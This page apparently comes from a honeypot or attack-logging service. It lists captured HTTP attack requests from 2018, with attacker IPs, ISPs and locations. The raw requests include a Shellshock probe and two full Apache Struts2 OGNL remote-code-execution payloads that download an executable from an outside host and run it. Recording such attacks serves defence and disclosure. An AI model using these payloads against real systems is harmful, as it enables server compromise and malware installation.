This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 16360 results (1636 pages)

Shellshock Exploit

[Attack info]
Attacker: 50.199.22.138
Dest. port: 80
Time: 10/12/2018 10:00:21
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS7922 Comcast Cable Communications, LLC
Location: Virginia, Stafford (zipcode 22555)
rDNS: 50-199-22-138-static.hfc.comcastbusiness.net
GET / HTTP/1.1 accept-language: en-US,en accept-encoding: deflate connection: Keep-alive, TE, close range: bytes=0-1048575 User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain BUGADO!"' Host: 150.152.32.232 referer: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain BUGADO!"' keep-alive: 30 te: deflate,gzip;q=0.3

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 182.150.141.186
Dest. port: 8080
Time: 09/12/2018 14:07:37
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4134 No.31,Jin-rong Street
Location: Sichuan, Zhongba
GET /index.do HTTP/1.1 accept-language: zh-cn accept-encoding: gbk, GB2312 Host: 150.152.32.232:8080 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) connection: Keep-Alive cache-control: no-cache Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/5.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/5.vbs&echo Post.Open "GET","http://a46.bulehero.in/download.exe",0 >>C:/5.vbs&echo Post.Send() >>C:/5.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/5.vbs&echo aGet.Mode = 3 >>C:/5.vbs&echo aGet.Type = 1 >>C:/5.vbs&echo aGet.Open() >>C:/5.vbs&echo aGet.Write(Post.responseBody) >>C:/5.vbs&echo aGet.SaveToFile "C:/Windows/temp/download.exe",2 >>C:/5.vbs&echo wscript.sleep 10000>>C:/5.vbs&echo Shell.Run ("C:/Windows/temp/download.exe")>>C:/5.vbs&C:/5.vbs').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 182.150.141.186
Dest. port: 8080
Time: 09/12/2018 14:07:35
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4134 No.31,Jin-rong Street
Location: Sichuan, Zhongba
GET /index.action HTTP/1.1 accept-language: zh-cn accept-encoding: gbk, GB2312 Host: 150.152.32.232:8080 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) connection: Keep-Alive cache-control: no-cache Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/5.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/5.vbs&echo Post.Open "GET","http://a46.bulehero.in/download.exe",0 >>C:/5.vbs&echo Post.Send() >>C:/5.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/5.vbs&echo aGet.Mode = 3 >>C:/5.vbs&echo aGet.Type = 1 >>C:/5.vbs&echo aGet.Open() >>C:/5.vbs&echo aGet.Write(Post.responseBody) >>C:/5.vbs&echo aGet.SaveToFile "C:/Windows/temp/download.exe",2 >>C:/5.vbs&echo wscript.sleep 10000>>C:/5.vbs&echo Shell.Run ("C:/Windows/temp/download.exe")>>C:/5.vbs&C:/5.vbs').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}